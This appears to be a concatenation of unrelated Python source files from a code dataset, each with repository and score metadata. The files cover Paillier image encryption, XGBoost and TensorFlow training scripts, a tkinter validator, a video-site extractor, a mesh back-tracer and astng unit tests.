        super(ModelInstance, self).__init__(position, rotation, uniformScale, size, shape, mass, isDynamic, ID, offset)
        self._materials = []
        self._attachedSounds = {}
        # Copy the base materials so per-instance edits don't leak back to
        # the shared model.
        for m in baseMats:
            self._materials.append(Material._fromMaterial(m))
        self._sounds = engine.sounds
        self._models = engine.models
        self._baseModelID = modelID
        self.animationQuality = animationQuality

    def getAnimationsList(self):
        """Return the names of the animations defined on the base model."""
        return list(self._models._getModel(self._baseModelID).animations.keys())

    def attachSound(self, bufferID, onObjectID):
        """Attach a monoaural sound to this instance and return it.

        @rtype : SoundClass.Sound
        @raise AttributeError: if the buffer is not monoaural.
        """
        sound = self._sounds.getSound(bufferID)
        if sound.channelCount > 1:
            raise AttributeError("Only monoaural sounds can be attached.\n"
                                 "Sound with bufferID '{0}' is not monoaural.".format(bufferID))
        sound.position = self.position
        self._attachedSounds[onObjectID] = sound
        return sound

    def removeAttachedSound(self, ID):
        """Best-effort removal of a previously attached sound."""
        if ID in self._attachedSounds:
            try:
                self._attachedSounds.pop(ID)
            except Exception:
                # Deliberately best-effort: losing a race with another
                # removal is not an error.
                pass

    def getAttachedSound(self, ID):
        """
        @rtype : Sound
        @raise KeyError: if no sound is attached under this ID.
        """
        if ID in self._attachedSounds.keys():
            return self._attachedSounds.get(ID)
        else:
            raise KeyError("The ID was not found")

    def getMaterialById(self, ID):
        """
        @rtype : Material
        @raise KeyError: if no material has the given ID.
        """
        # NOTE(review): this wraps each stored material in Material(tm)
        # before reading .ID -- confirm this is intended rather than tm.ID.
        for tm in self._materials:
            if Material(tm).ID == ID:
                return tm
        raise KeyError("The ID was not found")

    def getMaterialByIndex(self, index):
        """
        @rtype : Material
        """
        return self._materials[index]

    def _update(self):
        # Propagate the instance's position to any attached sounds whenever
        # the base object reports that its transform changed.
        if super(ModelInstance, self)._update():
            for Sn in self._attachedSounds.values():
                Sn.soundSource.position = list(self._position)
| 2.296875 | 2 |
main.py | sukreshmanda/paillier-image-processing | 2 | 12766805 | import numpy as np
from PIL import Image
from paillier import *
import sys
from matplotlib import pyplot as plt
class bcolors:
    """ANSI terminal escape sequences for coloured/styled console output."""

    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKCYAN = '\033[96m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'  # resets all colour/style attributes
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
class main:
    """Intended application-state holder for the interactive session.

    NOTE(review): ``__main__`` is not a special method Python ever invokes
    automatically (likely meant to be ``__init__``), and ``start`` is a
    stub -- this class appears to be unused scaffolding; confirm before
    relying on it.
    """

    def __main__(self):
        # NOTE(review): probably intended as __init__; never called by Python.
        self.imagepath = None
        self.c_image = None  # encrypted image, if any
        self.image = None  # plaintext image, if any
        self.is_image_loaded = False
        self.is_encrypted = False
        self.pail = paillier()
        self.priv, self.pub = self.pail.generate_keypair(20)

    def start(self):
        # Placeholder -- no behaviour yet.
        pass
def nothing():
    """Scratch/demo pipeline kept for reference; not called anywhere here.

    Encrypts an image, optionally applies one of the (commented-out)
    homomorphic transforms, then decrypts and saves the result.
    """
    pail = paillier()
    image = pail.open_image('simple.png')
    priv, pub = pail.generate_keypair(20)
    c_image = pail.encrypt_image(pub,image)
    #c_image = pail.multiply_by_const(pub, c_image, 2)
    #c_image = pail.swap_colors(pub, c_image, 'red', 'green')
    #c_image = pail.flip_image(pub, c_image)
    #c_image = pail.mirroring_image(pub, c_image)
    #p_image = pail.increase_color(pub, c_image, "red", 100)
    #c_image = pail.brightness(pub,c_image, 40)
    d_image = pail.decrypt_image(priv, pub, c_image)
    pail.save_image(d_image)
if __name__ == '__main__':
    # Interactive REPL: encrypt the image given on the command line, then
    # apply homomorphic transforms chosen by the user.
    pail = paillier()
    original = pail.open_image(sys.argv[1])
    priv, pub = pail.generate_keypair(20)
    c_image = pail.encrypt_image(pub, original)
    # The help text was previously duplicated in three places; keep one copy.
    help_text = (bcolors.OKGREEN
                 + "\tbrightness {value}\n\tcolor {color} {value}\n\tmirror\n\tflip\n\tswap {color1} {color2}\n\tmultiply {value}\n\tshow\n\tprint\n\tkeys"
                 + bcolors.ENDC)
    print("Enter help for options..")
    while(True):
        a = input(bcolors.OKCYAN+"(paillier)#> "+bcolors.ENDC)
        try:
            inputs = a.strip().split()
            if(inputs[0] == 'brightness'):
                c_image = pail.brightness(pub, c_image, int(inputs[1]))
            elif(inputs[0] == 'color'):
                c_image = pail.increase_color(pub, c_image, inputs[1], int(inputs[2]))
            elif(inputs[0] == 'mirror'):
                c_image = pail.mirroring_image(pub, c_image)
            elif(inputs[0] == 'flip'):
                c_image = pail.flip_image(pub, c_image)
            elif(inputs[0] == 'swap'):
                c_image = pail.swap_colors(pub, c_image, inputs[1], inputs[2])
            elif(inputs[0] == 'multiply'):
                # BUG FIX: the advertised {value} argument was ignored and a
                # constant 2 was always used.
                c_image = pail.multiply_by_const(pub, c_image, int(inputs[1]))
            elif(inputs[0] == 'print'):
                print(c_image)
            elif(inputs[0] == 'show'):
                # Show the original and the (decrypted) transformed image
                # side by side.
                fig = plt.figure(figsize=(10, 7))
                fig.add_subplot(1, 2, 1)
                if(len(original.shape) == 2):
                    plt.imshow(original, cmap='gray')
                else:
                    plt.imshow(original)
                plt.axis('off')
                plt.title("Original")
                result = pail.decrypt_image(priv, pub, c_image)
                fig.add_subplot(1, 2, 2)
                if(len(result.shape) == 2):
                    plt.imshow(result, cmap='gray')
                else:
                    plt.imshow(result)
                plt.axis('off')
                plt.title("Result")
                plt.show()
            elif(inputs[0] == 'keys'):
                print(bcolors.OKGREEN+"{} {}".format(pub, priv)+bcolors.ENDC)
            elif(inputs[0] == 'help'):
                print(help_text)
            else:
                print("Wrong input...")
                print(help_text)
        except Exception:
            # BUG FIX: was a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit and made Ctrl-C unusable.
            print("Wrong input...")
            print(help_text)
| 2.59375 | 3 |
xgb_train.py | 03pie/SMPCUP2017 | 25 | 12766806 | <reponame>03pie/SMPCUP2017
from collections import Counter
import pandas as pd
from sklearn import linear_model
from sklearn.linear_model import LogisticRegression
import xgboost as xgb
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn import preprocessing
from sklearn.cross_validation import train_test_split
from sklearn.model_selection import StratifiedKFold
import matplotlib.pyplot as plt
import numpy as np
# Paths to the SMP CUP 2017 Task 3 (user growth-value prediction) data.
data_root = '/media/jyhkylin/本地磁盘1/study/数据挖掘竞赛/SMPCUP2017/'
# Training labels: one (userID, growthValue) pair per \x01-separated line.
train3 = pd.read_table(data_root+'SMPCUP2017dataset/SMPCUP2017_TrainingData_Task3.txt'
    ,sep='\001' ,names=['userID' ,'growthValue'])
# Pre-computed per-user activity statistics, left-joined onto the labels.
stadata3 = pd.read_csv(data_root+'SMPCUP2017dataset/actStatisticData_new1.csv')
train3 = pd.merge(train3 ,stadata3 ,left_on='userID' ,right_on='userID' ,how='left')
x = np.array(train3.drop(['userID' ,'growthValue'] ,axis=1))
y = np.array(train3['growthValue'])
#submit
# Test users to score for the submission, joined with the same statistics.
test3 = pd.read_table(data_root+'SMPCUP2017dataset/SMPCUP2017_TestSet_Task3.txt' ,
    sep='\001' ,names=['userID'])
test3 = pd.merge(test3 ,stadata3 ,left_on='userID' ,right_on='userID' ,how='left')
# XGBoost regression parameters: tweedie objective, MAE evaluation,
# histogram tree method.
param = {'max_depth':10,
    'eta': 0.22,
    'silent': 1,
    'objective': 'reg:tweedie',
    'booster': 'gbtree' ,
    'seed':10 ,
    'base_score':0.5 ,
    'eval_metric':'mae' ,
    'min_child_weight':1 ,
    'gamma':0.007 ,
    'tree_method':'hist' ,
    'tweedie_variance_power':1.54 ,
    'nthread':4
    }
num_round = 45  # number of boosting rounds
dtrain = xgb.DMatrix(x,label=y)
bst = xgb.train(param, dtrain, num_round)
# Predict growth values for the test users and write the submission file.
x_t = xgb.DMatrix(np.array(test3.drop(['userID'] ,axis=1)))
y_t = bst.predict(x_t)
task3 = pd.DataFrame([test3['userID'] ,y_t]).T
task3 = task3.rename(columns={'userID':'userid' ,'Unnamed 0':'growthvalue'})
task3.to_csv('task3_final.txt' ,index=False ,sep=',')
| 2.234375 | 2 |
tf.py | ca7869/tensorflow | 0 | 12766807 | import os
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow.python import keras
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator
from tensorflow.python.keras.preprocessing.text import Tokenizer
from keras.utils import to_categorical
from tensorflow.python.keras.layers import Input, Dense
from keras.layers import Conv2D
from keras.layers import MaxPooling2D
from keras.layers import Flatten
from keras.layers.normalization import BatchNormalization
from keras.layers.advanced_activations import LeakyReLU
#from tensorflow.python.framework import ops
# Dataset layout: <base_dir>/{train,validation}/{cats,dogs}/*.jpg
base_dir = '/home/anoop/Downloads/dogs-vs-cats'
train_dir = os.path.join(base_dir, 'train')
validation_dir = os.path.join(base_dir, 'validation')
# Directory with our training cat/dog pictures
train_cats_dir = os.path.join(train_dir, 'cats')
train_dogs_dir = os.path.join(train_dir, 'dogs')
# Directory with our validation cat/dog pictures
validation_cats_dir = os.path.join(validation_dir, 'cats')
validation_dogs_dir = os.path.join(validation_dir, 'dogs')
train_cat_fnames = os.listdir( train_cats_dir )
train_dog_fnames = os.listdir( train_dogs_dir )
# Sanity-check the dataset by printing a sample of filenames and counts.
print(train_cat_fnames[:10])
print(train_dog_fnames[:10])
print('total training cat images :', len(os.listdir( train_cats_dir ) ))
print('total training dog images :', len(os.listdir( train_dogs_dir ) ))
print('total validation cat images :', len(os.listdir( validation_cats_dir ) ))
print('total validation dog images :', len(os.listdir( validation_dogs_dir ) ))
#/* %matplotlib inline
# Parameters for our graph; we'll output images in a 4x4 configuration
nrows = 4
ncols = 4
pic_index = 0 # Index for iterating over images
# Set up matplotlib fig, and size it to fit 4x4 pics
fig = plt.gcf()
fig.set_size_inches(ncols*4, nrows*4)
pic_index+=8
# Next 8 cat and 8 dog image paths to preview (display itself is
# commented out below).
next_cat_pix = [os.path.join(train_cats_dir, fname)
                for fname in train_cat_fnames[ pic_index-8:pic_index]
               ]
next_dog_pix = [os.path.join(train_dogs_dir, fname)
                for fname in train_dog_fnames[ pic_index-8:pic_index]
               ]
for i, img_path in enumerate(next_cat_pix+next_dog_pix):
  # Set up subplot; subplot indices start at 1
  sp = plt.subplot(nrows, ncols, i + 1)
  sp.axis('Off') # Don't show axes (or gridlines)
  img = mpimg.imread(img_path)
  # plt.imshow(img)
#plt.show()
# Stream training images from disk in batches of 20, rescaled to [0, 1]
# and resized to 150x150, with binary (cat/dog) labels.
train_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
    train_dir,
    target_size = (150,150),
    batch_size = 20,
    class_mode = 'binary'
)
# Small CNN: three conv/max-pool stages followed by a dense classifier.
model = tf.keras.models.Sequential([
    # Note the input shape is the desired size of the image 150x150 with 3 bytes color
    tf.keras.layers.Conv2D(16, (3,3), activation='relu', input_shape=(150, 150, 3)),
    tf.keras.layers.MaxPooling2D(2,2),
    tf.keras.layers.Conv2D(32, (3,3), activation='relu'),
    tf.keras.layers.MaxPooling2D(2,2),
    tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
    tf.keras.layers.MaxPooling2D(2,2),
    # Flatten the results to feed into a DNN
    tf.keras.layers.Flatten(),
    # 512 neuron hidden layer
    tf.keras.layers.Dense(512, activation='relu'),
    # Only 1 output neuron. It will contain a value from 0-1 where 0 for 1 class ('cats') and 1 for the other ('dogs')
    tf.keras.layers.Dense(1, activation='sigmoid')
])
src/intvalidate.py | vinceshores/tkvalidate | 0 | 12766808 | import tkinter as tk
def int_validate(entry_widget, from_=None, to=None):
    """
    Validates an entry_widget so that only integers within a specified range may be entered

    :param entry_widget: The tkinter.Entry widget to validate
    :param from_: The start limit of the integer
    :param to: The end limit of the integer
    :return: None
    """
    # Fall back to the widget's own from/to configuration when no explicit
    # bounds are supplied (index 4 of a configure() entry is the current value).
    if from_ is None:
        from_ = entry_widget.configure()['from'][4]
    if to is None:
        to = entry_widget.configure()['to'][4]
    text = entry_widget.get()
    current = int(text) if _is_int(text) else None
    check = _NumberCheck(entry_widget, from_, to, current=current)
    entry_widget.config(validate='all')
    entry_widget.config(validatecommand=check.vcmd)
    # Losing focus re-validates, restoring the last valid number if needed.
    entry_widget.bind('<FocusOut>', lambda event: _validate(entry_widget, check))
    _validate(entry_widget, check)
def _is_int(num_str):
"""
Returns whether or not a given string is an integer
:param num_str: The string to test
:return: Whether or not the string is an integer
"""
try:
int(num_str)
return True
except ValueError:
return False
def _validate(entry, num_check):
"""
Validates an entry so if there is invalid text in it it will be replaced by the last valid text
:param entry: The entry widget
:param num_check: The _NumberCheck instance that keeps track of the last valid number
:return: None
"""
if not _is_int(entry.get()):
entry.delete(0, tk.END)
entry.insert(0, str(num_check.last_valid))
class _NumberCheck:
"""
Class used for validating entry widgets, self.vcmd is provided as the validatecommand
"""
def __init__(self, parent, min_, max_, current):
self.parent = parent
self.low = min_
self.high = max_
self.vcmd = parent.register(self.in_integer_range), '%d', '%P'
if _NumberCheck.in_range(0, min_, max_):
self.last_valid = 0
else:
self.last_valid = min_
if current is not None:
self.last_valid = current
def in_integer_range(self, type_, after_text):
"""
Validates an entry to make sure the correct text is being inputted
:param type_: 0 for deletion, 1 for insertion, -1 for focus in
:param after_text: The text that the entry will display if validated
:return:
"""
if type_ == '-1':
if _is_int(after_text):
self.last_valid = int(after_text)
# Delete Action, always okay, if valid number save it
elif type_ == '0':
try:
num = int(after_text)
self.last_valid = num
except ValueError:
pass
return True
# Insert Action, okay based on ranges, if valid save num
elif type_ == '1':
try:
num = int(after_text)
except ValueError:
if self.can_be_negative() and after_text == '-':
return True
return False
if self.is_valid_range(num):
self.last_valid = num
return True
return False
return False
def can_be_negative(self):
"""
Tests whether this given entry widget can have a negative number
:return: Whether or not the entry can have a negative number
"""
return (self.low is None) or (self.low < 0)
def is_valid_range(self, num):
"""
Tests whether the given number is valid for this entry widgets range
:param num: The number to range test
:return: Whether or not the number is in range
"""
return _NumberCheck.in_range(num, self.low, self.high)
@staticmethod
def in_range(num, low, high):
"""
Tests whether or not a number is within a specified range inclusive
:param num: The number to test if its in the range
:param low: The minimum of the range
:param high: The maximum of the range
:return: Whether or not the number is in the range
"""
if (low is not None) and (num < low):
return False
if (high is not None) and (num > high):
return False
return True
if __name__ == '__main__':
    # Manual smoke test (requires a display): a Spinbox restricted to
    # integers in [-5, 10].
    import tkinter as tk
    from tkinter import ttk
    root = tk.Tk()
    widget = ttk.Spinbox(root, justify=tk.CENTER, from_=-5, to_=10)
    widget.pack(padx=10, pady=10)
    int_validate(widget)
    root.mainloop()
| 4.09375 | 4 |
youtuatools/extractor/ciscolive.py | Pagasis/YouTua | 47 | 12766809 | <filename>youtuatools/extractor/ciscolive.py
# coding: utf-8
from __future__ import unicode_literals
import itertools
from .common import InfoExtractor
from ..compat import (
compat_parse_qs,
compat_urllib_parse_urlparse,
)
from ..utils import (
clean_html,
float_or_none,
int_or_none,
try_get,
urlencode_postdata,
)
class CiscoLiveBaseIE(InfoExtractor):
    """Shared Rainfocus/Brightcove plumbing for the Cisco Live extractors."""

    # These appear to be constant across all Cisco Live presentations
    # and are not tied to any user session or event
    RAINFOCUS_API_URL = "https://events.rainfocus.com/api/%s"
    RAINFOCUS_API_PROFILE_ID = "Na3vqYdAlJFSxhYTYQGuMbpafMqftalz"
    RAINFOCUS_WIDGET_ID = "n6l4Lo05R8fiy3RpUBm447dZN8uNWoye"
    BRIGHTCOVE_URL_TEMPLATE = "http://players.brightcove.net/5647924234001/SyK2FdqjM_default/index.html?videoId=%s"
    HEADERS = {
        "Origin": "https://ciscolive.cisco.com",
        "rfApiProfileId": RAINFOCUS_API_PROFILE_ID,
        "rfWidgetId": RAINFOCUS_WIDGET_ID,
    }

    def _call_api(self, ep, rf_id, query, referrer, note=None):
        """POST *query* to Rainfocus endpoint *ep* and return the JSON reply."""
        request_headers = dict(self.HEADERS, Referer=referrer)
        return self._download_json(
            self.RAINFOCUS_API_URL % ep,
            rf_id,
            note=note,
            data=urlencode_postdata(query),
            headers=request_headers,
        )

    def _parse_rf_item(self, rf_item):
        """Map one Rainfocus session record onto a Brightcove url_transparent result."""
        title = rf_item["title"]
        bc_url = self.BRIGHTCOVE_URL_TEMPLATE % rf_item["videos"][0]["url"]
        duration = float_or_none(try_get(rf_item, lambda x: x["times"][0]["length"]))
        if duration:
            duration = duration * 60  # value appears to be minutes; convert to seconds
        return {
            "_type": "url_transparent",
            "url": bc_url,
            "ie_key": "BrightcoveNew",
            "title": title,
            "description": clean_html(rf_item.get("abstract")),
            "duration": duration,
            "creator": try_get(rf_item, lambda x: x["participants"][0]["fullName"]),
            "location": try_get(rf_item, lambda x: x["times"][0]["room"]),
            "series": rf_item.get("eventName"),
        }
class CiscoLiveSessionIE(CiscoLiveBaseIE):
    # Matches a single on-demand session, identified by the Rainfocus id
    # in the URL fragment after "#/session/".
    _VALID_URL = (
        r"https?://(?:www\.)?ciscolive(?:\.cisco)?\.com/[^#]*#/session/(?P<id>[^/?&]+)"
    )
    _TESTS = [
        {
            "url": "https://ciscolive.cisco.com/on-demand-library/?#/session/1423353499155001FoSs",
            "md5": "c98acf395ed9c9f766941c70f5352e22",
            "info_dict": {
                "id": "5803694304001",
                "ext": "mp4",
                "title": "13 Smart Automations to Monitor Your Cisco IOS Network",
                "description": "md5:ec4a436019e09a918dec17714803f7cc",
                "timestamp": 1530305395,
                "upload_date": "20180629",
                "uploader_id": "5647924234001",
                "location": "16B Mezz.",
            },
        },
        {
            "url": "https://www.ciscolive.com/global/on-demand-library.html?search.event=ciscoliveemea2019#/session/15361595531500013WOU",
            "only_matching": True,
        },
        {
            "url": "https://www.ciscolive.com/global/on-demand-library.html?#/session/1490051371645001kNaS",
            "only_matching": True,
        },
    ]

    def _real_extract(self, url):
        # Look the session up in the Rainfocus API, then delegate the
        # contained Brightcove video to the BrightcoveNew extractor.
        rf_id = self._match_id(url)
        rf_result = self._call_api("session", rf_id, {"id": rf_id}, url)
        return self._parse_rf_item(rf_result["items"][0])
class CiscoLiveSearchIE(CiscoLiveBaseIE):
    # Matches the on-demand library search page; the search filters are
    # carried in the query string and forwarded to the Rainfocus API.
    _VALID_URL = r"https?://(?:www\.)?ciscolive(?:\.cisco)?\.com/(?:global/)?on-demand-library(?:\.html|/)"
    _TESTS = [
        {
            "url": "https://ciscolive.cisco.com/on-demand-library/?search.event=ciscoliveus2018&search.technicallevel=scpsSkillLevel_aintroductory&search.focus=scpsSessionFocus_designAndDeployment#/",
            "info_dict": {
                "title": "Search query",
            },
            "playlist_count": 5,
        },
        {
            "url": "https://ciscolive.cisco.com/on-demand-library/?search.technology=scpsTechnology_applicationDevelopment&search.technology=scpsTechnology_ipv6&search.focus=scpsSessionFocus_troubleshootingTroubleshooting#/",
            "only_matching": True,
        },
        {
            "url": "https://www.ciscolive.com/global/on-demand-library.html?search.technicallevel=scpsSkillLevel_aintroductory&search.event=ciscoliveemea2019&search.technology=scpsTechnology_dataCenter&search.focus=scpsSessionFocus_bestPractices#/",
            "only_matching": True,
        },
    ]

    @classmethod
    def suitable(cls, url):
        # Session URLs also match this extractor's _VALID_URL; defer to the
        # more specific session extractor when it claims the URL.
        return (
            False
            if CiscoLiveSessionIE.suitable(url)
            else super(CiscoLiveSearchIE, cls).suitable(url)
        )

    @staticmethod
    def _check_bc_id_exists(rf_item):
        # Only yield search hits that actually carry a Brightcove video id.
        return (
            int_or_none(try_get(rf_item, lambda x: x["videos"][0]["url"])) is not None
        )

    def _entries(self, query, url):
        # Page through the Rainfocus search API, mutating `query` in place
        # ("from" is the offset, "size" the page length) until the reported
        # total is exhausted or a page comes back empty.
        query["size"] = 50
        query["from"] = 0
        for page_num in itertools.count(1):
            results = self._call_api(
                "search", None, query, url, "Downloading search JSON page %d" % page_num
            )
            # Some responses nest the items one level down in sectionList.
            sl = try_get(results, lambda x: x["sectionList"][0], dict)
            if sl:
                results = sl
            items = results.get("items")
            if not items or not isinstance(items, list):
                break
            for item in items:
                if not isinstance(item, dict):
                    continue
                if not self._check_bc_id_exists(item):
                    continue
                yield self._parse_rf_item(item)
            # Adopt the server's page size if it reports one.
            size = int_or_none(results.get("size"))
            if size is not None:
                query["size"] = size
            total = int_or_none(results.get("total"))
            if total is not None and query["from"] + query["size"] > total:
                break
            query["from"] += query["size"]

    def _real_extract(self, url):
        # Forward the page's query-string filters to the search API and wrap
        # the resulting sessions in a playlist.
        query = compat_parse_qs(compat_urllib_parse_urlparse(url).query)
        query["type"] = "session"
        return self.playlist_result(
            self._entries(query, url), playlist_title="Search query"
        )
| 1.953125 | 2 |
rendering/back_tracer.py | optas/geo_tool | 6 | 12766810 | '''
Created on Jul 25, 2016
@author: <NAME>
@contact: <EMAIL>
@copyright: You are free to use, change, or redistribute this code in any way
you want for non-commercial purposes.
'''
import glob
import os
import os.path as osp
from subprocess import call as sys_call
from .. in_out import soup as io
class Back_Tracer():
    '''
    A class providing the basic functionality for converting information
    regarding 2D rendered output of Fythumb back into the 3D space
    of the Mesh models.

    NOTE(review): uses Python 2 `print` statements and py2 map() semantics;
    this module is Python 2 only.
    '''

    # Absolute path to the external fythumb renderer binary.
    fythumb_bin = '/Users/optas/Documents/Eclipse_Projects/3d/thumb3d/build/thumb3d'

    def __init__(self, triangle_folder, in_mesh):
        '''
        Constructor.

        :param triangle_folder: folder of per-view "<vertex>_<twist>.txt"
            triangle files produced by compute_triangles_from_pixels.
        :param in_mesh: the Mesh instance the triangle files refer to.
        '''
        self.mesh = in_mesh
        self.map = Back_Tracer.generate_pixels_to_triangles_map(triangle_folder, in_mesh)

    def from_2D_to_3D(self, pixels, vertex_id, twist_id):
        # Look up the triangle index for each 2D pixel of the given view.
        return self.map[vertex_id, twist_id][pixels]

    def is_legit_view_and_twist(self, vertex_id, twist_id):
        # True when a triangle map exists for this camera position.
        return (vertex_id, twist_id) in self.map

    @staticmethod
    def render_views_of_shapes(top_dir, output_dir, regex):
        # Mirror top_dir's folder tree under output_dir, then render every
        # mesh file matching `regex` into its own sub-folder.
        io.copy_folder_structure(top_dir, output_dir)
        mesh_files = io.files_in_subdirs(top_dir, regex)
        if output_dir[-1] != os.sep:
            output_dir += os.sep
        for f in mesh_files:
            out_sub_folder = f.replace(top_dir, output_dir)
            mark = out_sub_folder[::-1].find('.') # Find last occurrence of '.' to remove the ending (e.g., .txt)
            if mark > 0:
                out_sub_folder = out_sub_folder[:-mark - 1]
            Back_Tracer.fythumb_compute_views_of_shape(f, out_sub_folder)

    @staticmethod
    def fythumb_compute_views_of_shape(mesh_file, output_dir):
        # -r: render all views of the given mesh into output_dir.
        sys_call([Back_Tracer.fythumb_bin, '-i', mesh_file, '-o', output_dir, '-r'])

    @staticmethod
    def pixels_to_triangles(pixel_file, off_file, camera_vertex, camera_twist, output_dir, out_file_name):
        # -s: map the listed screen pixels back to mesh triangles for the
        # camera defined by (vertex, twist).
        sys_call([Back_Tracer.fythumb_bin, '-i', off_file, '-s', pixel_file, '-o', output_dir,
                  '-v', camera_vertex, '-t', camera_twist, '-f', out_file_name])

    @staticmethod
    def compute_triangles_from_pixels(off_file, pixels_folder, output_folder):
        # Run pixels_to_triangles for every "<vertex>_<twist>" pixel file
        # found in pixels_folder.
        searh_pattern = osp.join(pixels_folder, '*.txt')
        c = 0
        for pixel_file in glob.glob(searh_pattern):
            camera_vertex, camera_twist = io.name_to_cam_position(pixel_file, cam_delim='_')
            out_file_name = '%d_%d.txt' % (camera_vertex, camera_twist)
            print 'Computing Triangles for %s file.' % (pixel_file)
            Back_Tracer.pixels_to_triangles(pixel_file, off_file, str(camera_vertex), str(camera_twist), output_folder, out_file_name)
            c += 1
        print 'Computed the triangles for %d files.' % (c)

    @staticmethod
    def generate_pixels_to_triangles_map(triangle_folder, in_mesh):
        # Build {(vertex, twist): {pixel_tuple: triangle_index}} from the
        # per-view triangle files, translating raw triangles to indices via
        # the mesh's inverse triangle dictionary.
        searh_pattern = osp.join(triangle_folder, '*.txt')
        inv_dict = in_mesh.inverse_triangle_dictionary()
        res = dict()
        for triangle_file in glob.glob(searh_pattern):
            camera_vertex, camera_twist = io.name_to_cam_position(triangle_file, cam_delim='_')
            res[(camera_vertex, camera_twist)] = dict()
            pixels, triangles, _ = io.read_triangle_file(triangle_file)
            triangles = map(tuple, triangles)
            triangles = [inv_dict[tr] for tr in triangles]
            pixels = map(tuple, pixels)
            res[(camera_vertex, camera_twist)] = {key: val for key, val in zip(pixels, triangles)}
        return res
if __name__ == '__main__':
    # Manual smoke test (Python 2): build a tracer for the screw mesh from
    # pre-computed salient-triangle files.
    from geo_tool.solids.mesh import Mesh
    in_mesh = Mesh('../Data/Screw/screw.off')
    bt = Back_Tracer('../Data/Screw/Salient_Triangles', in_mesh)
    print bt
| 2.1875 | 2 |
vendor/packages/logilab-astng/test/unittest_scoped_nodes.py | jgmize/kitsune | 2 | 12766811 | <reponame>jgmize/kitsune
# copyright 2003-2010 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:<EMAIL>
# copyright 2003-2010 <NAME>, all rights reserved.
# contact mailto:<EMAIL>
#
# This file is part of logilab-astng.
#
# logilab-astng is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 2.1 of the License, or (at your
# option) any later version.
#
# logilab-astng is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with logilab-astng. If not, see <http://www.gnu.org/licenses/>.
"""tests for specific behaviour of astng scoped nodes (i.e. module, class and
function)
"""
import sys
from os.path import join, abspath
from logilab.common.testlib import TestCase, unittest_main
from logilab.common.compat import sorted
from logilab.astng import builder, nodes, scoped_nodes, \
InferenceError, NotFoundError
from logilab.astng.bases import Instance, BoundMethod, UnboundMethod
abuilder = builder.ASTNGBuilder()
MODULE = abuilder.file_build('data/module.py', 'data.module')
MODULE2 = abuilder.file_build('data/module2.py', 'data.module2')
NONREGR = abuilder.file_build('data/nonregr.py', 'data.nonregr')
PACK = abuilder.file_build('data/__init__.py', 'data')
def _test_dict_interface(self, node, test_attr):
self.assert_(node[test_attr] is node[test_attr])
self.assert_(test_attr in node)
node.keys()
node.values()
node.items()
iter(node)
class ModuleNodeTC(TestCase):
    """Behaviour of astng Module nodes, exercised on the data/* fixtures."""

    def test_special_attributes(self):
        # Modules expose __name__/__doc__/__file__/__dict__ as synthetic
        # nodes; __path__ exists only on packages (PACK), not plain modules.
        self.assertEquals(len(MODULE.getattr('__name__')), 1)
        self.assertIsInstance(MODULE.getattr('__name__')[0], nodes.Const)
        self.assertEquals(MODULE.getattr('__name__')[0].value, 'data.module')
        self.assertEquals(len(MODULE.getattr('__doc__')), 1)
        self.assertIsInstance(MODULE.getattr('__doc__')[0], nodes.Const)
        self.assertEquals(MODULE.getattr('__doc__')[0].value, 'test module for astng\n')
        self.assertEquals(len(MODULE.getattr('__file__')), 1)
        self.assertIsInstance(MODULE.getattr('__file__')[0], nodes.Const)
        self.assertEquals(MODULE.getattr('__file__')[0].value, abspath(join('data', 'module.py')))
        self.assertEquals(len(MODULE.getattr('__dict__')), 1)
        self.assertIsInstance(MODULE.getattr('__dict__')[0], nodes.Dict)
        self.assertRaises(NotFoundError, MODULE.getattr, '__path__')
        self.assertEquals(len(PACK.getattr('__path__')), 1)
        self.assertIsInstance(PACK.getattr('__path__')[0], nodes.List)

    def test_dict_interface(self):
        # Modules support the mapping protocol over their locals.
        _test_dict_interface(self, MODULE, 'YO')

    def test_getattr(self):
        # getattr/igetattr resolve names defined in, or imported into, the
        # module, following redirections.
        yo = MODULE.getattr('YO')[0]
        self.assertIsInstance(yo, nodes.Class)
        self.assertEquals(yo.name, 'YO')
        red = MODULE.igetattr('redirect').next()
        self.assertIsInstance(red, nodes.Function)
        self.assertEquals(red.name, 'nested_args')
        spawn = MODULE.igetattr('spawn').next()
        self.assertIsInstance(spawn, nodes.Class)
        self.assertEquals(spawn.name, 'Execute')
        # resolve packageredirection
        sys.path.insert(1, 'data')
        try:
            m = abuilder.file_build('data/appl/myConnection.py', 'appl.myConnection')
            cnx = m.igetattr('SSL1').next().igetattr('Connection').next()
            self.assertEquals(cnx.__class__, nodes.Class)
            self.assertEquals(cnx.name, 'Connection')
            self.assertEquals(cnx.root().name, 'SSL1.Connection1')
        finally:
            del sys.path[1]
        self.assertEquals(len(NONREGR.getattr('enumerate')), 2)
        # raise ResolveError
        self.assertRaises(InferenceError, MODULE.igetattr, 'YOAA')

    def test_wildard_import_names(self):
        # wildcard_import_names honours __all__ when present (data/all.py),
        # otherwise falls back to the public names (data/notall.py).
        m = abuilder.file_build('data/all.py', 'all')
        self.assertEquals(m.wildcard_import_names(), ['Aaa', '_bla', 'name'])
        m = abuilder.file_build('data/notall.py', 'notall')
        res = m.wildcard_import_names()
        res.sort()
        self.assertEquals(res, ['Aaa', 'func', 'name', 'other'])

    def test_module_getattr(self):
        data = '''
appli = application
appli += 2
del appli
'''
        astng = abuilder.string_build(data, __name__, __file__)
        # test del statement not returned by getattr
        self.assertEquals(len(astng.getattr('appli')), 2,
                          astng.getattr('appli'))
class FunctionNodeTC(TestCase):
    """Tests for astng Function nodes: special attributes, sibling
    navigation, argument handling and abstractness detection.

    Relies on the module-level fixtures MODULE / MODULE2 (prebuilt astng
    trees for the data/ test modules).
    """
    def test_special_attributes(self):
